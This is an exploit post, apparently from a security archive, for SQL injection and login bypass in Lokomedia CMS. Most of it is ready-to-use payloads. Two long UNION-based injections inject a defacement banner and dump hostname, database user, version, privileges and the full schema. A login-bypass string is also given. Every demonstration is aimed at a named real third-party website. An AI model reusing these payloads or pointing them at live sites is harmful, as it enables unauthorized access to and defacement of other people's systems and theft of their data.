Lokomedia CMS - SQL Injection & Bypass SQL Login Vulnerabilities

2020.09.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################* # # Exploit Title: Lokomedia CMS - SQL Injection & Bypass SQL Login Vulnerabilities # Date: 2020-09-10 # Exploit Author: Gh05t666nero # Team: Indoghostsec # Category:webapps # Tested On: Linux localhost 4.14.117-perf+ #2 SMP PREEMPT Thu Jul 23 22:58:39 CST 2020 aarch64 Android ######################################################## # —·:(SQL Injection):·— # # Demo 1:- https://www.rumahmotogp.com/media.php?module=detailproduk&id=216%27+and+0+union+select+1,2,3,Concat(0x3C7363726970743E646F63756D656E742E7469746C653D22496E6A65637465642042792047683035743636366E65726F223B3C2F7363726970743E3C6C696E6B2072656C3D227374796C6573686565742220687265663D2268747470733A2F2F6D617863646E2E626F6F74737472617063646E2E636F6D2F626F6F7473747261702F342E332E312F6373732F626F6F7473747261702E6D696E2E637373223E3C63656E7465723E3C696D67207372633D2268747470733A2F2F692E6962622E636F2F466D4C344C314B2F67616D652D6172742D7261626269742E706E672220636C6173733D226D782D6175746F20642D626C6F636B20696D672D666C75696422207469746C653D2247683035743636366E65726F2220616C743D2247683035743636366E65726F22207374796C653D2277696474683A2032303070783B206865696768743A20323030707822202F3E3C2F63656E7465723E3C683220636C6173733D22746578742D63656E74657220746578742D64616E676572223E3C623E496E6A65637465642042792047683035743636366E65726F3C2F623E3C2F68323E3C63656E7465723E3C736D616C6C3E3C623E446174653A,NOW(),0x3c2f623e3c2f736d616c6c3e3c2f63656e7465723e3c62723e3c64697620636c6173733d227461626c652d726573706f6e73697665223e3c7461626c6520636c6173733d227461626c65207461626c652d73747269706564207461626c652d626f726465726564207461626c652d686f766572223e3c74723e3c746820636f6c7370616e3d22322220636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e42617369632053746174656d656e743c2f74683e3c2f74723e3c74723e3c74643e486f7374204e616d653a3c2f74643e3c74643e,@@hostname,0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653a3c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c74723e3c74643e557365723a3c2f74643e3c74643e,current_user(),0x3c2f74643e3c2f74723e3c74723e3c74643e4f7065726174696f6e2073797374656d3c2f74643e3c74643e,@@version_compile_os,0x3c2f74643e3c2f74723e3c74723e3c74643e56657273696f6e3a3c2f74643e3c74643e,version(),0x3c2f74643e3c2f74723e3c74723e3c74643e506f72743a3c2f74643e3c74643e,@@port,0x3c2f74643e3c2f74723e3c74723e3c74643e44617461204469723a3c2f74643e3c74643e,@@datadir,0x3c2f74643e3c2f74723e3c74723e3c74643e53796d6c696e6b3a3c2f74643e3c74643e,@@GLOBAL.have_symlink,0x3c2f74643e3c2f74723e3c74723e3c74643e53534c3a3c2f74643e3c74643e,@@GLOBAL.have_ssl,0x3c2f74643e3c2f74723e3c74723e3c74643e50726976696c65676573202f20696e74726f206f757466696c6520636865636b3c2f74643e3c74643e,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c2f74643e3c2f74723e3c2f7461626c653e3c62723e3c7461626c6520636c6173733d227461626c65207461626c652d73747269706564207461626c652d626f726465726564207461626c652d686f766572223e3c74723e3c746820636f6c7370616e3d22322220636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e44554d5020444154413c2f74683e3c2f74723e3c74723e3c746820636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e5461626c65204e616d653c2f74683e3c746820636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e4669656c64204e616d653c2f74683e3c2f74723e3c74723e,(select(@x)from(select(@x:=0x00),(select(0)/*!From*/(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat%20(@x,0x3c74723e3c74643e,table_name,0x3c2f74643e3c74643e,column_name))))x),0x3c2f74723e3c2f7461626c653e3c2f6469763e3c63656e7465723e3c7374726f6e673e4b6169746f4c6567696f6e3c2f7374726f6e673e3c2f63656e7465723e3c62723e203c212d2d),5,6,7,8,9,10,11,12,13--+- # # Demo 2:- http://siakad.nmcgroup.co.id/media.php?module=detailberita&id=1238'+And/**/.0union/*%26*/distinctROW+select+1,2,3,Concat(0x3C7363726970743E646F63756D656E742E7469746C653D22496E6A65637465642042792047683035743636366E65726F223B3C2F7363726970743E3C6C696E6B2072656C3D227374796C6573686565742220687265663D2268747470733A2F2F6D617863646E2E626F6F74737472617063646E2E636F6D2F626F6F7473747261702F342E332E312F6373732F626F6F7473747261702E6D696E2E637373223E3C63656E7465723E3C696D67207372633D2268747470733A2F2F692E6962622E636F2F466D4C344C314B2F67616D652D6172742D7261626269742E706E672220636C6173733D226D782D6175746F20642D626C6F636B20696D672D666C75696422207469746C653D2247683035743636366E65726F2220616C743D2247683035743636366E65726F22207374796C653D2277696474683A2032303070783B206865696768743A20323030707822202F3E3C2F63656E7465723E3C683220636C6173733D22746578742D63656E74657220746578742D64616E676572223E3C623E496E6A65637465642042792047683035743636366E65726F3C2F623E3C2F68323E3C63656E7465723E3C736D616C6C3E3C623E446174653A,NOW(),0x3c2f623e3c2f736d616c6c3e3c2f63656e7465723e3c62723e3c64697620636c6173733d227461626c652d726573706f6e73697665223e3c7461626c6520636c6173733d227461626c65207461626c652d73747269706564207461626c652d626f726465726564207461626c652d686f766572223e3c74723e3c746820636f6c7370616e3d22322220636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e42617369632053746174656d656e743c2f74683e3c2f74723e3c74723e3c74643e486f7374204e616d653a3c2f74643e3c74643e,@@hostname,0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653a3c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c74723e3c74643e557365723a3c2f74643e3c74643e,current_user(),0x3c2f74643e3c2f74723e3c74723e3c74643e4f7065726174696f6e2073797374656d3c2f74643e3c74643e,@@version_compile_os,0x3c2f74643e3c2f74723e3c74723e3c74643e56657273696f6e3a3c2f74643e3c74643e,version(),0x3c2f74643e3c2f74723e3c74723e3c74643e506f72743a3c2f74643e3c74643e,@@port,0x3c2f74643e3c2f74723e3c74723e3c74643e44617461204469723a3c2f74643e3c74643e,@@datadir,0x3c2f74643e3c2f74723e3c74723e3c74643e53796d6c696e6b3a3c2f74643e3c74643e,@@GLOBAL.have_symlink,0x3c2f74643e3c2f74723e3c74723e3c74643e53534c3a3c2f74643e3c74643e,@@GLOBAL.have_ssl,0x3c2f74643e3c2f74723e3c74723e3c74643e50726976696c65676573202f20696e74726f206f757466696c6520636865636b3c2f74643e3c74643e,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c2f74643e3c2f74723e3c2f7461626c653e3c62723e3c7461626c6520636c6173733d227461626c65207461626c652d73747269706564207461626c652d626f726465726564207461626c652d686f766572223e3c74723e3c746820636f6c7370616e3d22322220636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e44554d5020444154413c2f74683e3c2f74723e3c74723e3c746820636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e5461626c65204e616d653c2f74683e3c746820636c6173733d22746578742d63656e7465722062672d6461726b20746578742d7768697465223e4669656c64204e616d653c2f74683e3c2f74723e3c74723e,(select(@x)from(select(@x:=0x00),(select(0)/*!From*/(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat (@x,0x3c74723e3c74643e,table_name,0x3c2f74643e3c74643e,column_name))))x),0x3c2f74723e3c2f7461626c653e3c2f6469763e3c63656e7465723e3c7374726f6e673e4b6169746f4c6567696f6e3c2f7374726f6e673e3c2f63656e7465723e3c62723e203c212d2d),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+- ######################################################## # —·:(Bypass SQL Login):·— # # Username-Password:- nero' or'1'=1# # # Demo 1:- https://globalcomputerlampung.com/media.php?module=login # # Demo 2:- http://tbkyeyen.com/media.php?module=login ######################################################## # Contact Me:- gh05t666nero@gmail.com # Instagram:- @ojan_xploit # Telegram:- Gh05t666nero # Twitter:- @Gh05t666nero1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top